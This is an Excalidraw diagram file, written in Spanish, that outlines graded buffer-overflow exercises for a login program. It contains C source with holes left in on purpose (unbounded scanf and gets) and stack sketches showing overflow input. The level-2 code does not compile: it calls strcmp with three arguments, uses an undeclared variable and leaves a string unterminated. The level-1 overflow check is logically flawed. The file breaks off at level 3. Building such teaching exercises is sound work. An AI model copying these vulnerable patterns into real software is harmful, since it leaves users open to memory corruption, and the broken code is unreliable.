{
	"type": "excalidraw",
	"version": 2,
	"source": "https://github.com/zsviczian/obsidian-excalidraw-plugin/releases/tag/2.0.23",
	"elements": [
		{
			"type": "text",
			"version": 534,
			"versionNonce": 1336418520,
			"isDeleted": false,
			"id": "NOcX79lG",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -342.5111790680989,
			"y": -1112.3051945975028,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 498.130859375,
			"height": 60.138591093791156,
			"seed": 1331084905,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608996281,
			"link": null,
			"locked": false,
			"fontSize": 48.110872875032925,
			"fontFamily": 1,
			"text": "Grupo de ejercicios 1:",
			"rawText": "Grupo de ejercicios 1:",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "Grupo de ejercicios 1:",
			"lineHeight": 1.25,
			"baseline": 42
		},
		{
			"type": "text",
			"version": 1880,
			"versionNonce": 971052200,
			"isDeleted": false,
			"id": "9m8Rq6SU",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -362.88801039054783,
			"y": -1026.840904942701,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 861.4793701171875,
			"height": 475,
			"seed": 430563625,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727609043854,
			"link": null,
			"locked": false,
			"fontSize": 20,
			"fontFamily": 1,
			"text": "El primer set de ejercicios será una simple aplicación de login,\ndonde el usuario tendrá que insertar una clave secreta\npara poder ingresar. \n\nEl buffer de la clave será vulnerable a desbordamiento.\n\nVarias dificultades para este ejercicio:\n\n- Lvl 1: Analizar en ensamblador y descubrir el limite del buffer para \n        poder desbordarlo. Superado al insertar suficientes caracteres.\n        \n- Lvl 2: Necesitaremos meter una cadena de caracteres en concreto para superarlo:\n        e.j. 2 buffers de 20 de tamaño cada uno. Si desbordamos el primero el valor \n        del segundo podrá ser manipulado. \n\n- Lvl 3: Insertar una dirección de memoria para cambiar el flujo del \n        programa y ejecutar una función.\n\n- Lvl 4: Hacer un exploit de buffer overflow para abrir una shell de comandos.",
			"rawText": "El primer set de ejercicios será una simple aplicación de login,\ndonde el usuario tendrá que insertar una clave secreta\npara poder ingresar. \n\nEl buffer de la clave será vulnerable a desbordamiento.\n\nVarias dificultades para este ejercicio:\n\n- Lvl 1: Analizar en ensamblador y descubrir el limite del buffer para \n        poder desbordarlo. Superado al insertar suficientes caracteres.\n        \n- Lvl 2: Necesitaremos meter una cadena de caracteres en concreto para superarlo:\n        e.j. 2 buffers de 20 de tamaño cada uno. Si desbordamos el primero el valor \n        del segundo podrá ser manipulado. \n\n- Lvl 3: Insertar una dirección de memoria para cambiar el flujo del \n        programa y ejecutar una función.\n\n- Lvl 4: Hacer un exploit de buffer overflow para abrir una shell de comandos.",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "El primer set de ejercicios será una simple aplicación de login,\ndonde el usuario tendrá que insertar una clave secreta\npara poder ingresar. \n\nEl buffer de la clave será vulnerable a desbordamiento.\n\nVarias dificultades para este ejercicio:\n\n- Lvl 1: Analizar en ensamblador y descubrir el limite del buffer para \n        poder desbordarlo. Superado al insertar suficientes caracteres.\n        \n- Lvl 2: Necesitaremos meter una cadena de caracteres en concreto para superarlo:\n        e.j. 2 buffers de 20 de tamaño cada uno. Si desbordamos el primero el valor \n        del segundo podrá ser manipulado. \n\n- Lvl 3: Insertar una dirección de memoria para cambiar el flujo del \n        programa y ejecutar una función.\n\n- Lvl 4: Hacer un exploit de buffer overflow para abrir una shell de comandos.",
			"lineHeight": 1.25,
			"baseline": 468
		},
		{
			"type": "text",
			"version": 678,
			"versionNonce": 277986008,
			"isDeleted": false,
			"id": "SbRiRQqI",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -351.24740141797236,
			"y": -495.16089912203495,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 391.8724365234375,
			"height": 36.761935064214214,
			"seed": 260988871,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727609124654,
			"link": null,
			"locked": false,
			"fontSize": 29.409548051371374,
			"fontFamily": 1,
			"text": "Nivel1: Generar un overflow:",
			"rawText": "Nivel1: Generar un overflow:",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "Nivel1: Generar un overflow:",
			"lineHeight": 1.25,
			"baseline": 26
		},
		{
			"type": "text",
			"version": 2310,
			"versionNonce": 874238888,
			"isDeleted": false,
			"id": "HychCJJk",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -352.14642135528027,
			"y": -436.5855169921716,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 994.7791137695312,
			"height": 400,
			"seed": 695956745,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727609281681,
			"link": null,
			"locked": false,
			"fontSize": 20,
			"fontFamily": 1,
			"text": "Objetivo a atacar: Ejecutable de programa en C, al ejecutar al usuario\nse le pedirá una contraseña que no sabrá. \n\nFuncionamiento del programa: En primer lugar, el programa creara un buffer de 20 bytes de\ny pedirá al usuario una contraseña. El input del usuario se obtendrá mediante la función\nvulnerable scanf() donde se podrá desbordar el buffer. Luego habrá un if que compruebe si el buffer\nha sido desbordado.\n\nComo superar el nivel: El buffer que almacena el input de contraseña es vulnerable\na desbordamiento. El usuario descubrirá esto por prueba y error o analizando el ejecutable\nen gdb/assembly. Se dará por hecho que el usuario sabe lo básico sobre el uso de estas \nherramientas.\n\nCuando el usuario desborde el buffer, el programa lo detectará, y \navisara de que el nivel ha sido superado mediante un print.\n",
			"rawText": "Objetivo a atacar: Ejecutable de programa en C, al ejecutar al usuario\nse le pedirá una contraseña que no sabrá. \n\nFuncionamiento del programa: En primer lugar, el programa creara un buffer de 20 bytes de\ny pedirá al usuario una contraseña. El input del usuario se obtendrá mediante la función\nvulnerable scanf() donde se podrá desbordar el buffer. Luego habrá un if que compruebe si el buffer\nha sido desbordado.\n\nComo superar el nivel: El buffer que almacena el input de contraseña es vulnerable\na desbordamiento. El usuario descubrirá esto por prueba y error o analizando el ejecutable\nen gdb/assembly. Se dará por hecho que el usuario sabe lo básico sobre el uso de estas \nherramientas.\n\nCuando el usuario desborde el buffer, el programa lo detectará, y \navisara de que el nivel ha sido superado mediante un print.\n",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "Objetivo a atacar: Ejecutable de programa en C, al ejecutar al usuario\nse le pedirá una contraseña que no sabrá. \n\nFuncionamiento del programa: En primer lugar, el programa creara un buffer de 20 bytes de\ny pedirá al usuario una contraseña. El input del usuario se obtendrá mediante la función\nvulnerable scanf() donde se podrá desbordar el buffer. Luego habrá un if que compruebe si el buffer\nha sido desbordado.\n\nComo superar el nivel: El buffer que almacena el input de contraseña es vulnerable\na desbordamiento. El usuario descubrirá esto por prueba y error o analizando el ejecutable\nen gdb/assembly. Se dará por hecho que el usuario sabe lo básico sobre el uso de estas \nherramientas.\n\nCuando el usuario desborde el buffer, el programa lo detectará, y \navisara de que el nivel ha sido superado mediante un print.\n",
			"lineHeight": 1.25,
			"baseline": 393
		},
		{
			"type": "rectangle",
			"version": 1010,
			"versionNonce": 747414735,
			"isDeleted": false,
			"id": "L05WITynF4jY_if-PFb7T",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": 16.64920938432317,
			"y": -4.0253351154833865,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 245.25979408738021,
			"height": 34.57769417444692,
			"seed": 1830357319,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 3
			},
			"boundElements": [
				{
					"id": "9T6JZXaIvnxA8-ihlF5GE",
					"type": "arrow"
				}
			],
			"updated": 1711359523448,
			"link": null,
			"locked": false
		},
		{
			"type": "text",
			"version": 667,
			"versionNonce": 1457871272,
			"isDeleted": false,
			"id": "GkIWmzIH",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -355.9173019520928,
			"y": -51.32788272786914,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 326.671875,
			"height": 378.20562077153727,
			"seed": 1898541801,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [
				{
					"id": "9T6JZXaIvnxA8-ihlF5GE",
					"type": "arrow"
				}
			],
			"updated": 1727609274214,
			"link": null,
			"locked": false,
			"fontSize": 12.121975024728759,
			"fontFamily": 3,
			"text": "Codigo:\n\n#include <stdio.h>\n#include <string.h>\n\nint main() {\n  char buff[20]; \n  char password[] = \"contraseña\"; \n\n  printf(\"Insert password: \");\n  scanf(\"%s\", buff);\n\n  \n  if(strlen(buff) > sizeof(buff)){\n    printf(\"Buffer overflow detected\\n\");\n    return 1;\n  }else if (strcmp(buff, password) == 0) {\n    printf(\"Pasword correct!!! Welcome!!!\\n\");\n  } else {\n    printf(\"Incorrect password.\\n\");\n  }\n\n  return 0;\n}\n\n",
			"rawText": "Codigo:\n\n#include <stdio.h>\n#include <string.h>\n\nint main() {\n  char buff[20]; \n  char password[] = \"contraseña\"; \n\n  printf(\"Insert password: \");\n  scanf(\"%s\", buff);\n\n  \n  if(strlen(buff) > sizeof(buff)){\n    printf(\"Buffer overflow detected\\n\");\n    return 1;\n  }else if (strcmp(buff, password) == 0) {\n    printf(\"Pasword correct!!! Welcome!!!\\n\");\n  } else {\n    printf(\"Incorrect password.\\n\");\n  }\n\n  return 0;\n}\n\n",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "Codigo:\n\n#include <stdio.h>\n#include <string.h>\n\nint main() {\n  char buff[20]; \n  char password[] = \"contraseña\"; \n\n  printf(\"Insert password: \");\n  scanf(\"%s\", buff);\n\n  \n  if(strlen(buff) > sizeof(buff)){\n    printf(\"Buffer overflow detected\\n\");\n    return 1;\n  }else if (strcmp(buff, password) == 0) {\n    printf(\"Pasword correct!!! Welcome!!!\\n\");\n  } else {\n    printf(\"Incorrect password.\\n\");\n  }\n\n  return 0;\n}\n\n",
			"lineHeight": 1.2,
			"baseline": 375
		},
		{
			"type": "arrow",
			"version": 714,
			"versionNonce": 930680024,
			"isDeleted": false,
			"id": "9T6JZXaIvnxA8-ihlF5GE",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": -234.9342177721835,
			"y": 40.53176328773239,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 232.08512278568128,
			"height": 33.383974837806505,
			"seed": 772111975,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1727609262371,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": {
				"elementId": "GkIWmzIH",
				"focus": 0.48606065898743395,
				"gap": 26.396331965590605
			},
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": "arrow",
			"points": [
				[
					0,
					0
				],
				[
					232.08512278568128,
					-33.383974837806505
				]
			]
		},
		{
			"type": "line",
			"version": 341,
			"versionNonce": 494335873,
			"isDeleted": false,
			"id": "Bd9svjjtf3qybH1yZWR9r",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 130.89578315795387,
			"y": -3.8640954948883177,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 0.41357421767116875,
			"height": 34.740767166605394,
			"seed": 1062813511,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1711359523449,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					0.41357421767116875,
					34.740767166605394
				]
			]
		},
		{
			"type": "rectangle",
			"version": 1361,
			"versionNonce": 1396112655,
			"isDeleted": false,
			"id": "XcXB4g1RIN6jMe1zBsF4g",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": 17.60601536778438,
			"y": 81.2288569694301,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 245.25979408738021,
			"height": 34.57769417444692,
			"seed": 1739557897,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 3
			},
			"boundElements": [],
			"updated": 1711359523449,
			"link": null,
			"locked": false
		},
		{
			"type": "line",
			"version": 561,
			"versionNonce": 1569611617,
			"isDeleted": false,
			"id": "xEYpq9HzB2vEVoA750_7g",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 131.85258914141508,
			"y": 81.3900965900252,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 0.41357421767116875,
			"height": 34.740767166605394,
			"seed": 1137910505,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1711359523449,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					0.41357421767116875,
					34.740767166605394
				]
			]
		},
		{
			"type": "text",
			"version": 314,
			"versionNonce": 1087032280,
			"isDeleted": false,
			"id": "7q9P6VXf",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 22.25241705398878,
			"y": -31.95892834289782,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 40.95994567871094,
			"height": 25,
			"seed": 499817097,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961270,
			"link": null,
			"locked": false,
			"fontSize": 20,
			"fontFamily": 1,
			"text": "buff",
			"rawText": "buff",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "buff",
			"lineHeight": 1.25,
			"baseline": 18
		},
		{
			"type": "text",
			"version": 362,
			"versionNonce": 519732648,
			"isDeleted": false,
			"id": "YX7jmmQn",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 135.63248928582095,
			"y": -34.72272432953585,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 73.65992736816406,
			"height": 25,
			"seed": 323166255,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961271,
			"link": null,
			"locked": false,
			"fontSize": 20,
			"fontFamily": 1,
			"text": "memoria",
			"rawText": "memoria",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "memoria",
			"lineHeight": 1.25,
			"baseline": 18
		},
		{
			"type": "text",
			"version": 380,
			"versionNonce": 1110675672,
			"isDeleted": false,
			"id": "HBjsC0Hx",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 27.33313798790624,
			"y": 88.1184790967769,
			"strokeColor": "#e03131",
			"backgroundColor": "transparent",
			"width": 222.65625,
			"height": 24,
			"seed": 1638276033,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961272,
			"link": null,
			"locked": false,
			"fontSize": 20,
			"fontFamily": 3,
			"text": "AAAAAAAAAAAAAAAAAAA",
			"rawText": "AAAAAAAAAAAAAAAAAAA",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "AAAAAAAAAAAAAAAAAAA",
			"lineHeight": 1.2,
			"baseline": 19
		},
		{
			"type": "arrow",
			"version": 1090,
			"versionNonce": 1130414959,
			"isDeleted": false,
			"id": "WDUlJMYx1sOv9WlramvIF",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": -99.9392794552183,
			"y": 142.1438769440587,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 257.04750053157045,
			"height": 47.041269593754464,
			"seed": 506341921,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1711359523449,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": "arrow",
			"points": [
				[
					0,
					0
				],
				[
					214.206260193773,
					36.96104141653865
				],
				[
					257.04750053157045,
					-10.080228177215815
				]
			]
		},
		{
			"type": "text",
			"version": 367,
			"versionNonce": 1496090792,
			"isDeleted": false,
			"id": "ttJoPJc1",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 180.53704723951694,
			"y": 152.39819028359966,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 171.19989013671875,
			"height": 40,
			"seed": 1603089025,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961272,
			"link": null,
			"locked": false,
			"fontSize": 16,
			"fontFamily": 1,
			"text": "Detectar si el buffer\nha sido desbordado",
			"rawText": "Detectar si el buffer\nha sido desbordado",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "Detectar si el buffer\nha sido desbordado",
			"lineHeight": 1.25,
			"baseline": 34
		},
		{
			"type": "text",
			"version": 904,
			"versionNonce": 71022040,
			"isDeleted": false,
			"id": "PRFxyFey",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -353.44584784690704,
			"y": 337.22277506345523,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 484.65875244140625,
			"height": 36.761935064214214,
			"seed": 465219969,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961273,
			"link": null,
			"locked": false,
			"fontSize": 29.409548051371374,
			"fontFamily": 1,
			"text": "Nivel2:  Manipulación de variables",
			"rawText": "Nivel2:  Manipulación de variables",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "Nivel2:  Manipulación de variables",
			"lineHeight": 1.25,
			"baseline": 26
		},
		{
			"type": "text",
			"version": 3612,
			"versionNonce": 1922561960,
			"isDeleted": false,
			"id": "2s2HF2RQ",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -354.34486778421496,
			"y": 395.79815719331856,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 907.6591796875,
			"height": 425,
			"seed": 256563553,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727609346403,
			"link": null,
			"locked": false,
			"fontSize": 20,
			"fontFamily": 1,
			"text": "Objetivo a atacar: Ejecutable de programa en C, al ejecutar al usuario\nse le pedirá una contraseña que no sabrá. \n\nFuncionamiento del programa: A diferencia del nivel 1, el nivel 2 contiene 2 buffers \n(buff1 y buff2). El buffer 1 es vulnerable a desbordamiento y puede afectar a los \ndatos del buffer 2. El usuario descubrirá esto analizando la pila \ncon gdb para ver los resultados del desbordamiento. Después hay varios if que comprueban\nsi los contenidos de buff1 y buff2 son iguales.\n\nComo superar el nivel: Mediante el desbordamiento del buffer1 se puede manipular el\ncontenido de buffer2 haciendo que se inicie sesión si el contenido de los 2 llega a ser el \nmismo.\n\nAunque la clave secreta insertada sea fácilmente visible con IDA o hexdump,\nsi el usuario descubre esto e inserta simplemente la clave en el programa sin hacer \nningún desbordamiento, no se imprimirá el mensaje de nivel superado.\n",
			"rawText": "Objetivo a atacar: Ejecutable de programa en C, al ejecutar al usuario\nse le pedirá una contraseña que no sabrá. \n\nFuncionamiento del programa: A diferencia del nivel 1, el nivel 2 contiene 2 buffers \n(buff1 y buff2). El buffer 1 es vulnerable a desbordamiento y puede afectar a los \ndatos del buffer 2. El usuario descubrirá esto analizando la pila \ncon gdb para ver los resultados del desbordamiento. Después hay varios if que comprueban\nsi los contenidos de buff1 y buff2 son iguales.\n\nComo superar el nivel: Mediante el desbordamiento del buffer1 se puede manipular el\ncontenido de buffer2 haciendo que se inicie sesión si el contenido de los 2 llega a ser el \nmismo.\n\nAunque la clave secreta insertada sea fácilmente visible con IDA o hexdump,\nsi el usuario descubre esto e inserta simplemente la clave en el programa sin hacer \nningún desbordamiento, no se imprimirá el mensaje de nivel superado.\n",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "Objetivo a atacar: Ejecutable de programa en C, al ejecutar al usuario\nse le pedirá una contraseña que no sabrá. \n\nFuncionamiento del programa: A diferencia del nivel 1, el nivel 2 contiene 2 buffers \n(buff1 y buff2). El buffer 1 es vulnerable a desbordamiento y puede afectar a los \ndatos del buffer 2. El usuario descubrirá esto analizando la pila \ncon gdb para ver los resultados del desbordamiento. Después hay varios if que comprueban\nsi los contenidos de buff1 y buff2 son iguales.\n\nComo superar el nivel: Mediante el desbordamiento del buffer1 se puede manipular el\ncontenido de buffer2 haciendo que se inicie sesión si el contenido de los 2 llega a ser el \nmismo.\n\nAunque la clave secreta insertada sea fácilmente visible con IDA o hexdump,\nsi el usuario descubre esto e inserta simplemente la clave en el programa sin hacer \nningún desbordamiento, no se imprimirá el mensaje de nivel superado.\n",
			"lineHeight": 1.25,
			"baseline": 418
		},
		{
			"type": "rectangle",
			"version": 1552,
			"versionNonce": 1665921967,
			"isDeleted": false,
			"id": "ZUIZIr92OBbBoCc8PHc3t",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": 165.10602733726597,
			"y": 881.7037766855406,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 245.25979408738021,
			"height": 34.57769417444692,
			"seed": 306906433,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 3
			},
			"boundElements": [
				{
					"id": "XkYbObvnLj_fIZk8r7rNy",
					"type": "arrow"
				}
			],
			"updated": 1711359523449,
			"link": null,
			"locked": false
		},
		{
			"type": "text",
			"version": 1522,
			"versionNonce": 2079800024,
			"isDeleted": false,
			"id": "pWVKQKtW",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -356.55313943188156,
			"y": 828.4212524654829,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 454.5,
			"height": 392.7519908012118,
			"seed": 1075492129,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961276,
			"link": null,
			"locked": false,
			"fontSize": 12.121975024728759,
			"fontFamily": 3,
			"text": "Codigo:\n\n#include <stdio.h>\n#include <string.h>\n\nint main() {\n  char buff2[20]; \n  char buff1[20]; \n\n  printf(\"Insertar clave secreta: \");\n  strncpy(buff2, \"clave1234\", 20);\n  gets(buff1);\n\n  if(0 == strcmp (buff1,buff2,20)){\n      printf(\"sesion iniciada\");\n      if(strlen(buff) > sizeof(buff)){\n        printf(\"Nivel 2 superado!!);\n      }else{\n        printf(\"Contraseña correcta pero buffer no desbordado\");\n      }\n  }else{\n      printf(\"Contraseña incirrecta\");\n  }\n  return 0;\n}\n\n",
			"rawText": "Codigo:\n\n#include <stdio.h>\n#include <string.h>\n\nint main() {\n  char buff2[20]; \n  char buff1[20]; \n\n  printf(\"Insertar clave secreta: \");\n  strncpy(buff2, \"clave1234\", 20);\n  gets(buff1);\n\n  if(0 == strcmp (buff1,buff2,20)){\n      printf(\"sesion iniciada\");\n      if(strlen(buff) > sizeof(buff)){\n        printf(\"Nivel 2 superado!!);\n      }else{\n        printf(\"Contraseña correcta pero buffer no desbordado\");\n      }\n  }else{\n      printf(\"Contraseña incirrecta\");\n  }\n  return 0;\n}\n\n",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "Codigo:\n\n#include <stdio.h>\n#include <string.h>\n\nint main() {\n  char buff2[20]; \n  char buff1[20]; \n\n  printf(\"Insertar clave secreta: \");\n  strncpy(buff2, \"clave1234\", 20);\n  gets(buff1);\n\n  if(0 == strcmp (buff1,buff2,20)){\n      printf(\"sesion iniciada\");\n      if(strlen(buff) > sizeof(buff)){\n        printf(\"Nivel 2 superado!!);\n      }else{\n        printf(\"Contraseña correcta pero buffer no desbordado\");\n      }\n  }else{\n      printf(\"Contraseña incirrecta\");\n  }\n  return 0;\n}\n\n",
			"lineHeight": 1.2,
			"baseline": 390
		},
		{
			"type": "line",
			"version": 712,
			"versionNonce": 981574305,
			"isDeleted": false,
			"id": "945Ez2IkPHXJa4x5Kk8P5",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 279.35260111089667,
			"y": 881.8650163061359,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 0.41357421767116875,
			"height": 34.740767166605394,
			"seed": 267821281,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1711359523450,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					0.41357421767116875,
					34.740767166605394
				]
			]
		},
		{
			"type": "rectangle",
			"version": 1862,
			"versionNonce": 1641550831,
			"isDeleted": false,
			"id": "jBLFVOq9nGFNUAAw0dtYh",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": 169.1378989061012,
			"y": 1039.9560181623692,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 245.25979408738021,
			"height": 34.57769417444692,
			"seed": 689036481,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 3
			},
			"boundElements": [
				{
					"id": "PkKIby6RCviNPszEo-hN3",
					"type": "arrow"
				}
			],
			"updated": 1711359523450,
			"link": null,
			"locked": false
		},
		{
			"type": "line",
			"version": 1061,
			"versionNonce": 1448519297,
			"isDeleted": false,
			"id": "mkXONZkBuvis6svKSI6oH",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 283.3844726797319,
			"y": 1040.1172577829643,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 0.41357421767116875,
			"height": 34.740767166605394,
			"seed": 387620001,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1711359523450,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					0.41357421767116875,
					34.740767166605394
				]
			]
		},
		{
			"type": "text",
			"version": 880,
			"versionNonce": 1313898152,
			"isDeleted": false,
			"id": "MpjmRLsX",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 178.86502152622307,
			"y": 1046.845640289716,
			"strokeColor": "#e03131",
			"backgroundColor": "transparent",
			"width": 222.65625,
			"height": 24,
			"seed": 288015393,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961276,
			"link": null,
			"locked": false,
			"fontSize": 20,
			"fontFamily": 3,
			"text": "AAAAAAAAAAAAAAAAAAA",
			"rawText": "AAAAAAAAAAAAAAAAAAA",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "AAAAAAAAAAAAAAAAAAA",
			"lineHeight": 1.2,
			"baseline": 19
		},
		{
			"type": "text",
			"version": 916,
			"versionNonce": 1543118808,
			"isDeleted": false,
			"id": "GAWbgYdw",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": 712.7584169813836,
			"y": -1081.5630542973977,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 636.1275634765625,
			"height": 36.761935064214214,
			"seed": 1483251471,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961277,
			"link": null,
			"locked": false,
			"fontSize": 29.409548051371374,
			"fontFamily": 1,
			"text": "Nivel3: Manipulación de dirección de memoria:",
			"rawText": "Nivel3: Manipulación de dirección de memoria:",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
